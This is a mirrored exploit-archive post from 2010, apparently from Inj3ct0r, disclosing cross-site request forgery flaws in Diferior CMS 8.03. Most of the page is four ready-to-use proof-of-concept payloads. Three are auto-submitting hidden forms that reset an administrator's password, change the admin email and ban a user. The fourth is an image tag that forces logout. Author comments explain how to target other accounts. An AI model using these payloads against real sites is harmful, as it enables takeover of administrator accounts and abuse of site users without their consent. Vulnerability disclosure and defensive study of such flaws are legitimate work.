Home / os / win7

Diferior CMS 8.03 Multiple CSRF Vulnerabilities

Posted on 13 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== Diferior CMS 8.03 Multiple CSRF Vulnerabilities =============================================== &lt;!--- Title: Diferior CMS 8.03 Multiple CSRF Vulnerabilities Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt; Date: Tue 13 Jul 2010 11:50:32 AM EEST Vendor: http://diferior.com/ Download: http://diferior.com/post_files/news/diferior-8-03-released/Diferior_v8.03.tar.gz ---&gt; -=[ CSRF PoC 1 - Change Admin Password ]=- &lt;html&gt; &lt;head&gt; &lt;title&gt;Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Password&lt;/title&gt; &lt;/head&gt; &lt;body onload=&quot;document.csrf.submit();&quot;&gt; &lt;form name=&quot;csrf&quot; action=&quot;http://[domain]/user/profile/pass.html&quot; method=&quot;post&quot;&gt; &lt;!--- You can change cust_user to change the password of other user ---&gt; &lt;input type=&quot;hidden&quot; name=&quot;cust_user&quot; value=&quot;admin&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;pass1&quot; value=&quot;rootroot&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;pass2&quot; value=&quot;rootroot&quot; /&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt; -=[ CSRF PoC 2 - Change Admin Email ]=- &lt;html&gt; &lt;head&gt; &lt;title&gt;Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Email&lt;/title&gt; &lt;/head&gt; &lt;body onload=&quot;document.csrf.submit();&quot;&gt; &lt;form name=&quot;csrf&quot; action=&quot;http://[domain]/user/profile/email.html&quot; method=&quot;post&quot;&gt; &lt;!--- You can change cust_user to change the email of other user ---&gt; &lt;input type=&quot;hidden&quot; name=&quot;cust_user&quot; value=&quot;admin&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;email1&quot; value=&quot;root@root.com&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;email2&quot; value=&quot;root@root.com&quot; /&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt; -=[ CSRF PoC 3 - Ban User ]=- &lt;html&gt; &lt;head&gt; &lt;title&gt;Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Ban User&lt;/title&gt; &lt;/head&gt; &lt;body onload=&quot;document.csrf.submit();&quot;&gt; &lt;form name=&quot;csrf&quot; action=&quot;http://[domain]/user/ban/[username]/2.html&quot; method=&quot;post&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;warned&quot; value=&quot;on&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;noleech&quot; value=&quot;on&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;banned&quot; value=&quot;on&quot; /&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt; -=[ CSRF PoC 4 - Logout The User/Administrator ]=- &lt;img src=&quot;http://[domain]/user/logoff.html&quot; alt=&quot;Do you see this?&quot; /&gt; &lt;!--- http://www.evilzone.org/ irc.evilzone.org (6697 / 9999) ---&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-13]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP